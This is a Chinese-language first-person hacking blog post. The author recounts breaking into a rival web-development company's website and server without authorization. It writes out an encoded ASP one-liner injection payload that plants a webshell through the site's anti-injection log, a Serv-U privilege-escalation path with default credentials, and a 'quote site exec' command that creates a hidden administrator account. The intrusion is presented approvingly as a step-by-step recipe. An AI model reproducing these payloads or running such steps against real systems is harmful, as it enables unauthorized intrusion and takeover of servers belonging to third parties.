突破IP封杀反拿webshell顺便再拿服务器

今天某客户要自己网站的后台密码(无语,总有白痴客户天天忘记密码)..
没办法,给人家找呗,客户是上帝哈..
进去一看,不是偶公司做的,应该是之前和其它公司合作不愉快转到我们这的吧,后台N个上传页面都没验证,无语啊..
密码也是明文存放,一下就搞定给客户回复..
但是偶对这站不放心,发现前台页面修改时间有问题,打开看看,果然被拿搞过,黑链一大堆...
删掉之后,懒的找漏洞(清木马补漏洞又不给偶加并薪水,管那么多做什么..嘿嘿),权限全部搞成只读
客户问题先这样搞定..
言归正传,刚才说过,网站是其它公司做的,然后客户又转到我们这的,那么这家网站公司很可能给客户做网站都用的这个CMS
,我现在可算是有源码了,想黑他还不容易?? 说不定他们的官网就是用的这个CMS呢..
看了下版权的技术支持,到他们的官网去看了看,果然如此,和我手上的这个站一模一样,后台路径及文件完全一样...好,既然是这样,
我就找找漏洞吧,找后台密码先进去,试了一下下他的数据库,发现下不了(要能下下来,可就惨了,别忘了,密码可是明文的),
密码搞不到,再试试注入..
这不注不要紧,一注就被封了IP ,卡把锁...够狠..
IP被封了,这回麻烦了,只能到自己客户这网站上看看有没有突破口...
有几个上传页面试了试,可总是写入失败,不知道咋回事..
上传算是没戏了...
再找,发现在线编辑器,登录没删...admin,admin竟然登进去了,原来客户的网站从这被搞的
马上去那家公司官网上,找到在线编辑器的登录,这个还真有,admin,admin,晕,进不去(给自己的改,却不给客户的改,什么人么..),
试了下其它密码也不行,数据库也DOWN不下来,试了几个常见的样式上传,还是不行..
编辑器也没戏了..

看来得另寻曲径..

突然想起,刚才SQL注入把偶IP封了么... 封了看似很糟,网站都打不开了,还怎么黑?
但是细想一下,被封应该是把我的IP记录到数据库里吧...不过要是你的数据库是asp或asa的...哼哼...该怎么办它,不用偶说了吧..
数据库一句话就要了你的命...
回到客户网站看了下,果然,数据库是asp的,这不能怪我了, 并且还发现,这个SQL防注入的管理页面没权限...看了下客户网站的注入记录,有几百条...
再到这家公司官网上去看了看,竟然有6万多条,看来网站访问量很大...拿到之后偶来挂黑链不爽死
好了,不废话了...怎么拿不用我教吧?
随便找个页面来个 ?id='┼攠數畣整爠煥敵瑳∨∣┩愾 一句话不就被插进去了...
等等,刚才被封IP了,还得解封,咱有SQL注入管理页面,干脆删掉所有记录...防止数据库过大,干扰一句话运行..
然后就故意注入, ?id='┼攠數畣整爠煥敵瑳∨∣┩愾 ,....
又被封了...不过这回封了偶,你会后悔的, 因为封了偶一句话就把你办了

输入防注入的sql数据库地址,返回了一大堆,关键是最下面出现了execute错误的提示,这就意味着可以太阳了...

用客户端连接就得到了大马...

网站拿到了..服务器呢?
看了下组件,有CMDSHELL, tasklist看了下,有SERV-U...看来这服务器又要挂到SERV-U上了..
找了找SERV-U的默认路径,未果
但打开E盘,...狂喜,权限很大,所有的网站都列了出来,连SERVU的目录都在E盘...这管管,够小白..
把SERVU目录DOWN下来,研究了一番...
版本比较新,9.4的...并且没有密码验证..(那就是默认滴咯)
翻了个SERV-U提权的马马..传上去...提提看..
晕,又是最后一步...提权执行不了...
还得手动来..
看了下SERV-U马马的源码, FTP端口为60000,用户名为ash,密码为hahaha
FTP连了下...一下就进去了..爽
提权: quote site exec "c:\windows\system32\cmd.exe /c net user Hack$ 123456!@# /add&net localgroup administrators hack$ /add "
执行成功!!!
webshell看了下,Hack$ 存在

admin权限也有了.. 3389上...WEBSHELL上显示端口被改成了8860, ...
有点不爽的是3389始终没上去...不知道做了什么限制..用工具强开了下还是上不了
不过..别忘了现在咱可是有system和admin权限的,随便丢个远控不就完事了?...
见于是同行,这缺德事咱也不做了...呵呵